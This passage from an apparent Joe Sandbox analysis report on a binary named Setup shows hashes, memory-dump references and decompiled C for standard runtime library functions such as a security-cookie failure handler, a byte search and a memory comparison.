                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ___getlocaleinfo
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1937885557-0
                                                                                                                                                                                              • Opcode ID: 6658356a753b5cfc695507bdc396cfc3e761ceac1b28ff85074bbc2df3565815
                                                                                                                                                                                              • Instruction ID: abd7550889cad5f6e72c2e8ebd8d19e09a77a061959e0a2380ecc9ef80c7cfaa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6658356a753b5cfc695507bdc396cfc3e761ceac1b28ff85074bbc2df3565815
                                                                                                                                                                                              • Instruction Fuzzy Hash: B0E103B290020DBEEF12DAF1CD81EFF77FDEB04748F00096AB615D2041EAB5AA559760
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004070B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E004070B5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x454b30; // 0xf05a9d73
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x456668 = _t6;
				 *0x456664 = _t22;
				 *0x456660 = _t25;
				 *0x45665c = _t21;
				 *0x456658 = _t27;
				 *0x456654 = _t26;
				 *0x456680 = ss;
				 *0x456674 = cs;
				 *0x456650 = ds;
				 *0x45664c = es;
				 *0x456648 = fs;
				 *0x456644 = gs;
				asm("pushfd");
				_pop( *0x456678);
				 *0x45666c =  *_t31;
				 *0x456670 = _v0;
				 *0x45667c =  &_a4;
				 *0x4565b8 = 0x10001;
				_t11 =  *0x456670; // 0x0
				 *0x45656c = _t11;
				 *0x456560 = 0xc0000409;
				 *0x456564 = 1;
				_t12 =  *0x454b30; // 0xf05a9d73
				_v812 = _t12;
				_t13 =  *0x454b34; // 0xfa5628c
				_v808 = _t13;
				 *0x4565b0 = IsDebuggerPresent();
				_push(1);
				E0040C22C(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("`eE");
				if( *0x4565b0 == 0) {
					_push(1);
					E0040C22C(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                                                              0x004070b5
                                                                                                                                                                                              0x004070b5
                                                                                                                                                                                              0x004070b5
                                                                                                                                                                                              0x004070b5
                                                                                                                                                                                              0x004070b5
                                                                                                                                                                                              0x004070b5
                                                                                                                                                                                              0x004070b5
                                                                                                                                                                                              0x004070bb
                                                                                                                                                                                              0x004070bd
                                                                                                                                                                                              0x004070bd
                                                                                                                                                                                              0x0040e8fc
                                                                                                                                                                                              0x0040e901
                                                                                                                                                                                              0x0040e907
                                                                                                                                                                                              0x0040e90d
                                                                                                                                                                                              0x0040e913
                                                                                                                                                                                              0x0040e919
                                                                                                                                                                                              0x0040e91f
                                                                                                                                                                                              0x0040e926
                                                                                                                                                                                              0x0040e92d
                                                                                                                                                                                              0x0040e934
                                                                                                                                                                                              0x0040e93b
                                                                                                                                                                                              0x0040e942
                                                                                                                                                                                              0x0040e949
                                                                                                                                                                                              0x0040e94a
                                                                                                                                                                                              0x0040e953
                                                                                                                                                                                              0x0040e95b
                                                                                                                                                                                              0x0040e963
                                                                                                                                                                                              0x0040e96e
                                                                                                                                                                                              0x0040e978
                                                                                                                                                                                              0x0040e97d
                                                                                                                                                                                              0x0040e982
                                                                                                                                                                                              0x0040e98c
                                                                                                                                                                                              0x0040e996
                                                                                                                                                                                              0x0040e99b
                                                                                                                                                                                              0x0040e9a1
                                                                                                                                                                                              0x0040e9a6
                                                                                                                                                                                              0x0040e9b2
                                                                                                                                                                                              0x0040e9b7
                                                                                                                                                                                              0x0040e9b9
                                                                                                                                                                                              0x0040e9c1
                                                                                                                                                                                              0x0040e9cc
                                                                                                                                                                                              0x0040e9d9
                                                                                                                                                                                              0x0040e9db
                                                                                                                                                                                              0x0040e9dd
                                                                                                                                                                                              0x0040e9e2
                                                                                                                                                                                              0x0040e9f6

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040E9AC
                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040E9C1
                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(`eE), ref: 0040E9CC
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0040E9E8
                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0040E9EF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                              • String ID: `eE
                                                                                                                                                                                              • API String ID: 2579439406-2846505167
                                                                                                                                                                                              • Opcode ID: 43788e2c0b65c01d4674dc650700471a066f71b189598fd1787c902a9fc53617
                                                                                                                                                                                              • Instruction ID: 2be1fee0f2d041d5ff30fbd6836cfe3a057031a6dc4a22089be12b8a1c527bc6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 43788e2c0b65c01d4674dc650700471a066f71b189598fd1787c902a9fc53617
                                                                                                                                                                                              • Instruction Fuzzy Hash: A021CDB4901304EFD750DF65F8896183BB4FB68306F82523AE80997262E774D981CF1D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040DAC7 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040DAC7() {

				SetUnhandledExceptionFilter(E0040DA85);
				return 0;
			}



                                                                                                                                                                                              0x0040dacc
                                                                                                                                                                                              0x0040dad4

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000DA85), ref: 0040DACC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                              • Opcode ID: 5cd8f35f92d8f6fd268beacc4b8f32dad779c5b3f4cf2a0808690454584a5aca
                                                                                                                                                                                              • Instruction ID: 598bb83a96eeee5037ddd23cf015ac4474cc4e0b6d328fbc688e34725f2ae579
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cd8f35f92d8f6fd268beacc4b8f32dad779c5b3f4cf2a0808690454584a5aca
                                                                                                                                                                                              • Instruction Fuzzy Hash: D7900260B5515046C61417F05C0D5157694DAA960279154756D11D4094EA74405D5D19
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00406E00 Relevance: 1.3, Strings: 1, Instructions: 76COMMONLIBRARYCODECrypto
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00406E00(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}













                                                                                                                                                                                              0x00406e00
                                                                                                                                                                                              0x00406e07
                                                                                                                                                                                              0x00406e5c
                                                                                                                                                                                              0x00406e5c
                                                                                                                                                                                              0x00406e09
                                                                                                                                                                                              0x00406e09
                                                                                                                                                                                              0x00406e0f
                                                                                                                                                                                              0x00406e19
                                                                                                                                                                                              0x00406e31
                                                                                                                                                                                              0x00406e31
                                                                                                                                                                                              0x00406e34
                                                                                                                                                                                              0x00406e48
                                                                                                                                                                                              0x00406e48
                                                                                                                                                                                              0x00406e4b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e4d
                                                                                                                                                                                              0x00406e4d
                                                                                                                                                                                              0x00406e4d
                                                                                                                                                                                              0x00406e4f
                                                                                                                                                                                              0x00406e54
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e56
                                                                                                                                                                                              0x00406e59
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e59
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e4d
                                                                                                                                                                                              0x00406e36
                                                                                                                                                                                              0x00406e43
                                                                                                                                                                                              0x00406e62
                                                                                                                                                                                              0x00406e64
                                                                                                                                                                                              0x00406e72
                                                                                                                                                                                              0x00406e7b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e7d
                                                                                                                                                                                              0x00406e80
                                                                                                                                                                                              0x00406e82
                                                                                                                                                                                              0x00406eac
                                                                                                                                                                                              0x00406e84
                                                                                                                                                                                              0x00406e84
                                                                                                                                                                                              0x00406e86
                                                                                                                                                                                              0x00406ea6
                                                                                                                                                                                              0x00406e88
                                                                                                                                                                                              0x00406e8b
                                                                                                                                                                                              0x00406e8d
                                                                                                                                                                                              0x00406ea0
                                                                                                                                                                                              0x00406e8f
                                                                                                                                                                                              0x00406e91
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e93
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e93
                                                                                                                                                                                              0x00406e91
                                                                                                                                                                                              0x00406e8d
                                                                                                                                                                                              0x00406e86
                                                                                                                                                                                              0x00406e82
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e5d
                                                                                                                                                                                              0x00406e5d
                                                                                                                                                                                              0x00406e5d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e47
                                                                                                                                                                                              0x00406e1b
                                                                                                                                                                                              0x00406e1b
                                                                                                                                                                                              0x00406e1b
                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                              0x00406e22
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e24
                                                                                                                                                                                              0x00406e27
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e29
                                                                                                                                                                                              0x00406e2f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e2f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406e27
                                                                                                                                                                                              0x00406e96
                                                                                                                                                                                              0x00406e9a
                                                                                                                                                                                              0x00406e9a
                                                                                                                                                                                              0x00406e19
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              Strings
                                                                                                                                                                                              • 0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00406E36
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                              • API String ID: 0-4256519037
                                                                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                              • Instruction ID: dcf65a64f99b94a3ffb86bcead6f3615ba7027999c8dbef55400ce6fa4a9015f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 02110B7F20034183D6158A3DD9B46B7A396EFC532072F427BD0435B7D4D23AA5659588
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00406762 Relevance: .4, Instructions: 384COMMONCrypto
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00406762(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

































                                                                                                                                                                                              0x00406762
                                                                                                                                                                                              0x00406762
                                                                                                                                                                                              0x00406768
                                                                                                                                                                                              0x004067e8
                                                                                                                                                                                              0x004067ea
                                                                                                                                                                                              0x004067ec
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004067f2
                                                                                                                                                                                              0x004067f8
                                                                                                                                                                                              0x00406877
                                                                                                                                                                                              0x00406879
                                                                                                                                                                                              0x0040687b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406881
                                                                                                                                                                                              0x00406887
                                                                                                                                                                                              0x00406906
                                                                                                                                                                                              0x00406908
                                                                                                                                                                                              0x0040690a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406910
                                                                                                                                                                                              0x00406916
                                                                                                                                                                                              0x00406995
                                                                                                                                                                                              0x00406997
                                                                                                                                                                                              0x00406999
